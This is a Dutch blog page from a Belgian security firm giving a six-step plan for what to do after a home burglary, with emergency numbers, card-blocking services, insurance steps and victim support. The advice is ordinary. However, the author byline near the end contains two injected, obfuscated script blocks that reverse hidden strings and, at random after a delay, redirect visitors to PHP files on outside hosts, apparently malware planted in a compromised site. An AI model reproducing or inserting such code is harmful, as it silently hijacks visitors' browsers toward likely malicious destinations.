Wat te doen na inbraak?

Wij goten de stappen die je na een inbraak in je woning moet ondernemen in een duidelijk stappenplan.

In 2020 werd er om de 15 minuten in België ingebroken. Dit komt neer op 94 inbraken per dag. Heel wat Belgen komen dagelijks nog in contact met inbraak.

Het is belangrijk om na een inbraak de juiste stappen te ondernemen, een foutje is namelijk vlug gebeurd. Maar hoe pak je dit best aan? We ontwikkelden een stappenplan met acties die je na inbraak moet ondernemen.

Je huis preventief beveiligen tegen inbraak?

Neem contact op voor een verkennend gesprek of offerte.

Onze gratis inbraakpreventie checklist geeft je alvast 10 tips om het risico op inbraak in je huis te verminderen.

Inbraakpreventie checklist

1. Bel de politie op het 101-noodnummer

  • Ga zelf nooit de confrontatie aan met inbrekers. 
  • Probeer zoveel mogelijk te observeren als je de inbreker op heterdaad betrapt: kijk naar kledij, uiterlijke kenmerken, vluchtrichting en vluchtmiddel.

2. Raak niks aan en ruim niets op

  • Als je kan vermijden het huis binnen te gaan, doe dit en wacht tot de politie er is.
  • Verplaats niets en ruim niets op in afwachting van de politie. Anders gaan er sporen verloren. 
  • Wacht met het herstellen van ramen en deuren. 
  • Neem foto’s van de inbraak (sporen, schade, enz..) 
  • Wijs de politie gerust op mogelijke tekenen van sporen. 

3. Blokkeer je bankkaarten en/of officiële documenten

Bel cardstop op 070 344 344 of surf naar www.cardstop.be als de inbrekers je bankkaarten hebben gestolen. Officieel document ontvreemd? Of het nu gaat over een paspoort, ID-kaart of een verblijfsvergunning, laat ze blokkeren door contact op te nemen met DOC STOP via het nummer 00800/2123 2123 of via www.docstop.be.

4. Neem contact op met je verzekeringsmaatschappij, ook in geval van poging tot inbraak

Geef je verzekeraar zoveel mogelijk informatie: proces-verbaal, inventarislijst, foto’s van gestolen voorwerpen, aankoopfacturen enz.

5. Denk aan jezelf

Het slachtoffer worden van inbraak kan allerhande gevolgen met zich meebrengen. Wetende dat een onbekende je woning is binnengedrongen is vaak traumatiserend en geeft je een onveilig gevoel. Als deze gevolgen blijven duren en je levenskwaliteit daaronder te lijden heeft, aarzel dan niet om contact op te nemen met een hulpdienst.

Dienst voor politiële slachtofferbejegening (DPSB) 

Deze dienst komt onmiddellijk na de feiten en op korte termijn tussen. Je kan hier terecht voor morele steun, advies of een luisterend oor. U krijgt hulp voor praktische en administratieve zaken, u krijgt informatie over uw rechten, enz. De DPSB biedt geen psychologische ondersteuning, maar zal u, indien nodig, doorverwijzen naar de juiste diensten voor opvang op langere termijn.

Je huisarts 

Neem zeker contact op met je huisarts, want je huisarts kent je goed en kan je de nodige ondersteuning en gepaste begeleiding voorzien.

6. Tref extra maatregelen in de toekomst

Bij 1 op 12 mensen die slachtoffer zijn van inbraak, wordt binnen korte tijd opnieuw ingebroken. Inbrekers kiezen bewust huizen waar het makkelijk(er) is om in te breken.

Tref de juiste maatregelen om inbraak in de toekomst te voorkomen. De 10 tips in onze inbraakpreventie checklist helpen je alvast op weg.

Inbraakpreventie checklist

Conclusie

Met deze 6 stappen weet je wat te doen na inbraak. Voorkomen is echter beter dan genezen. Wil je inbraak graag voorkomen? Kies voor een sterk beveiligingssysteem.

Een goede beveiliging is erg waardevol als preventiemiddel. Hiermee ben je gewaarschuwd als er inbrekers in huis zijn. De visuele aanwezigheid van een alarmsysteem schrikt ongewenst bezoek af. Onze beveiligingsadviseurs komen graag bij je langs om de mogelijkheden te overlopen.

Kurt fo<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to

Kurt Vanpoucke

Beveiligingsadviseur | Varel Security